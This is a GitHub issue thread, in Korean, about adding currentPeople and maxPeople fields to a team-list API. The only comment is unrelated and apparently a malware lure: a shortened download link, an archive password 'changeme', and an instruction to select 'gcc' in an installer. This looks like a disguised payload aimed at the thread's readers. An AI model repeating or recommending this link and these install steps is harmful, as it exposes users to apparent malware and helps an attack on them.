### ISSUE TITLE
refactor: `사용자 팀 목록 조회` API 수정을 위한 코드 수정

### ISSUE THREAD

**Issue by KOKEONHO** [yujik-tigers/dowith#36]
- `currentPeople` 필드 추가 필요
- `maxPeople` 필드 추가 필요
- (선택 사항) 현재 API를 단독 사용한다면 `description`은 필요하지 않음

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
